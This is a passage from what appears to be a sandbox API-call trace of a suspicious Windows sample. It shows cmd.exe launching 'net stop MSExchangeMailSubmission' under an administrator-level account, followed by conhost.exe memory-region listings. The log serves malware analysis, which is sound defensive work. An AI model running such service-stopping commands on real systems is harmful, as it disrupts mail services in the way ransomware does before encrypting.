lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0137.238] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4f4f8e4, lpFilePart=0x4f4f8dc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f4f8dc*="Desktop") returned 0x1d [0137.238] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0137.239] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4f4f660 | out: lpFindFileData=0x4f4f660) returned 0x52e05c8 [0137.239] FindClose (in: hFindFile=0x52e05c8 | out: hFindFile=0x52e05c8) returned 1 [0137.239] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4f4f660 | out: lpFindFileData=0x4f4f660) returned 0x52e05c8 [0137.239] FindClose (in: hFindFile=0x52e05c8 | out: hFindFile=0x52e05c8) returned 1 [0137.239] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0137.239] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4f4f660 | out: lpFindFileData=0x4f4f660) returned 0x52e05c8 [0137.239] FindClose (in: hFindFile=0x52e05c8 | out: hFindFile=0x52e05c8) returned 1 [0137.239] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0137.239] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0137.239] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0137.239] GetEnvironmentStringsW () returned 0x52e7d80* [0137.239] FreeEnvironmentStringsA (penv="=") returned 1 [0137.239] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0137.240] GetConsoleOutputCP () returned 0x1b5 [0137.240] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0137.240] GetUserDefaultLCID () returned 0x409 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4f4fa14, cchData=128 | out: lpLCData="0") returned 2 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4f4fa14, cchData=128 | out: lpLCData="0") returned 2 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4f4fa14, cchData=128 | out: lpLCData="1") returned 2 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0137.240] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0137.240] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0137.241] GetConsoleTitleW (in: lpConsoleTitle=0x52eaa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.242] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0137.242] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0137.242] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0137.242] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0137.242] _wcsicmp (_String1="net", _String2=")") returned 69 [0137.242] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0137.242] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0137.242] _wcsicmp (_String1="IF", _String2="net") returned -5 [0137.242] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0137.242] _wcsicmp (_String1="REM", _String2="net") returned 4 [0137.242] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0137.243] GetConsoleTitleW (in: lpConsoleTitle=0x4f4f700, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.243] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0137.243] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0137.243] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0137.243] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0137.243] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0137.243] _wcsicmp (_String1="net", _String2="CD") returned 11 [0137.243] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0137.244] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0137.244] _wcsicmp (_String1="net", _String2="REN") returned -4 [0137.244] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0137.244] _wcsicmp (_String1="net", _String2="SET") returned -5 [0137.244] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0137.244] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0137.244] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0137.244] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0137.244] _wcsicmp (_String1="net", _String2="MD") returned 1 [0137.244] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0137.244] _wcsicmp (_String1="net", _String2="RD") returned -4 [0137.244] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0137.244] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0137.244] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0137.244] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0137.244] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0137.244] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0137.244] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0137.244] _wcsicmp (_String1="net", _String2="VER") returned -8 [0137.244] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0137.244] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0137.244] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0137.244] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0137.244] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0137.244] _wcsicmp (_String1="net", _String2="START") returned -5 [0137.244] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0137.244] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0137.244] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0137.244] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0137.244] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0137.244] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0137.244] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0137.244] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0137.244] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0137.244] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0137.244] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0137.244] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0137.244] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0137.244] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0137.244] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0137.244] _wcsicmp (_String1="net", _String2="CD") returned 11 [0137.244] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0137.244] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0137.244] _wcsicmp (_String1="net", _String2="REN") returned -4 [0137.244] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0137.244] _wcsicmp (_String1="net", _String2="SET") returned -5 [0137.244] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0137.244] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0137.244] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0137.244] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0137.244] _wcsicmp (_String1="net", _String2="MD") returned 1 [0137.244] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0137.244] _wcsicmp (_String1="net", _String2="RD") returned -4 [0137.244] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0137.244] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0137.245] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0137.245] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0137.245] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0137.245] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0137.245] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0137.245] _wcsicmp (_String1="net", _String2="VER") returned -8 [0137.245] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0137.245] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0137.245] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0137.245] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0137.245] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0137.245] _wcsicmp (_String1="net", _String2="START") returned -5 [0137.245] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0137.245] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0137.245] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0137.245] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0137.245] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0137.245] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0137.245] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0137.245] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0137.245] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0137.245] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0137.245] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0137.245] _wcsicmp (_String1="net", _String2="IF") returned 5 [0137.245] _wcsicmp (_String1="net", _String2="REM") returned -4 [0137.245] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0137.245] SetErrorMode (uMode=0x0) returned 0x0 [0137.245] SetErrorMode (uMode=0x1) returned 0x0 [0137.245] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x52e05d0, lpFilePart=0x4f4f20c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f4f20c*="Desktop") returned 0x1d [0137.245] SetErrorMode (uMode=0x0) returned 0x1 [0137.245] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0137.245] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0137.253] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0137.253] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0137.253] GetConsoleTitleW (in: lpConsoleTitle=0x4f4f48c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.253] InitializeProcThreadAttributeList (in: lpAttributeList=0x4f4f3b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4f4f39c | out: lpAttributeList=0x4f4f3b8, lpSize=0x4f4f39c) returned 1 [0137.253] UpdateProcThreadAttribute (in: lpAttributeList=0x4f4f3b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x4f4f3a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4f4f3b8, lpPreviousValue=0x0) returned 1 [0137.253] GetStartupInfoW (in: lpStartupInfo=0x4f4f3f0 | out: lpStartupInfo=0x4f4f3f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0137.253] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0137.253] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0137.253] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0137.253] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.253] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.253] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.253] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0137.254] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0137.254] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0137.255] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeMailSubmission", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4f4f340*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeMailSubmission", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4f4f38c | out: lpCommandLine="net stop MSExchangeMailSubmission", lpProcessInformation=0x4f4f38c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x9a0, dwThreadId=0x948)) returned 1 [0137.261] CloseHandle (hObject=0xa4) returned 1 [0137.261] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0137.261] GetEnvironmentStringsW () returned 0x52e9ee8* [0137.261] FreeEnvironmentStringsA (penv="=") returned 1 [0137.261] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0137.431] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4f4f324 | out: lpExitCode=0x4f4f324*=0x2) returned 1 [0137.431] CloseHandle (hObject=0xa8) returned 1 [0137.431] _vsnwprintf (in: _Buffer=0x4f4f40c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4f4f32c | out: _Buffer="00000002") returned 8 [0137.431] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0137.431] GetEnvironmentStringsW () returned 0x52e7d80* [0137.431] FreeEnvironmentStringsA (penv="=") returned 1 [0137.431] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0137.431] GetEnvironmentStringsW () returned 0x52e7d80* [0137.431] FreeEnvironmentStringsA (penv="=") returned 1 [0137.431] DeleteProcThreadAttributeList (in: lpAttributeList=0x4f4f3b8 | out: lpAttributeList=0x4f4f3b8) [0137.431] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.431] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0137.432] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.432] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0137.432] _get_osfhandle (_FileHandle=0) returned 0x38 [0137.432] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0137.432] SetConsoleInputExeNameW () returned 0x1 [0137.432] GetConsoleOutputCP () returned 0x1b5 [0137.432] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0137.432] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.432] exit (_Code=2) Thread: id = 654 os_tid = 0x928 Process: id = "214" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x11ec4000" os_pid = "0xf30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "213" os_parent_pid = "0x854" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10590 start_va = 0x7f03e000 end_va = 0x7f03efff entry_point = 0x0 region_type = private name = "private_0x000000007f03e000" filename = "" Region: id = 10591 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10592 start_va = 0x76eb860000 end_va = 0x76eb87ffff entry_point = 0x0 region_type = private name = "private_0x00000076eb860000" filename = "" Region: id = 10593 start_va = 0x76eb880000 end_va = 0x76eb893fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076eb880000" filename = "" Region: id = 10594 start_va = 0x76eb8a0000 end_va = 0x76eb8dffff entry_point = 0x0 region_type = private name = "private_0x00000076eb8a0000" filename = "" Region: id = 10595 start_va = 0x7df5ffa90000 end_va = 0x7ff5ffa8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa90000" filename = "" Region: id = 10596 start_va = 0x7ff6c42a0000 end_va = 0x7ff6c42c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42a0000" filename = "" Region: id = 10597 start_va = 0x7ff6c42cd000 end_va = 0x7ff6c42cefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c42cd000" filename = "" Region: id = 10598 start_va = 0x7ff6c42cf000 end_va = 0x7ff6c42cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c42cf000" filename = "" Region: id = 10599 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 10600 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10601 start_va = 0x76eb860000 end_va = 0x76eb86ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076eb860000" filename = "" Region: id = 10602 start_va = 0x76eb870000 end_va = 0x76eb876fff entry_point = 0x0 region_type = private name = "private_0x00000076eb870000" filename = "" Region: id = 10603 start_va = 0x76eb8e0000 end_va = 0x76eb99dfff entry_point = 0x76eb8e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10604 start_va = 0x76eb9a0000 end_va = 0x76eb9dffff entry_point = 0x0 region_type = private name = "private_0x00000076eb9a0000" filename = "" Region: id = 10605 start_va = 0x76eb9e0000 end_va = 0x76eb9e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076eb9e0000" filename = "" Region: id = 10606 start_va = 0x76eb9f0000 end_va = 0x76eb9f6fff entry_point = 0x0 region_type = private name = "private_0x00000076eb9f0000" filename = "" Region: id = 10607 start_va = 0x76eba00000 end_va = 0x76eba00fff entry_point = 0x0 region_type = private name = "private_0x00000076eba00000" filename = "" Region: id = 10608 start_va = 0x76eba10000 end_va = 0x76eba10fff entry_point = 0x0 region_type = private name = "private_0x00000076eba10000" filename = "" Region: id = 10609 start_va = 0x76eba90000 end_va = 0x76ebb8ffff entry_point = 0x0 region_type = private name = "private_0x00000076eba90000" filename = "" Region: id = 10610 start_va = 0x76ebc40000 end_va = 0x76ebc4ffff entry_point = 0x0 region_type = private name = "private_0x00000076ebc40000" filename = "" Region: id = 10611 start_va = 0x76ebc50000 end_va = 0x76ebdd7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076ebc50000" filename = "" Region: id = 10612 start_va = 0x76ebde0000 end_va = 0x76ebf60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076ebde0000" filename = "" Region: id = 10613 start_va = 0x76ebf70000 end_va = 0x76ed36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076ebf70000" filename = "" Region: id = 10614 start_va = 0x7ff6c41a0000 end_va = 0x7ff6c429ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41a0000" filename = "" Region: id = 10615 start_va = 0x7ff6c42cb000 end_va = 0x7ff6c42ccfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c42cb000" filename = "" Region: id = 10616 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 10617 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10618 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10619 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10620 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10621 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10622 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10623 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10624 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10625 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10626 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10627 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10628 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10629 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = 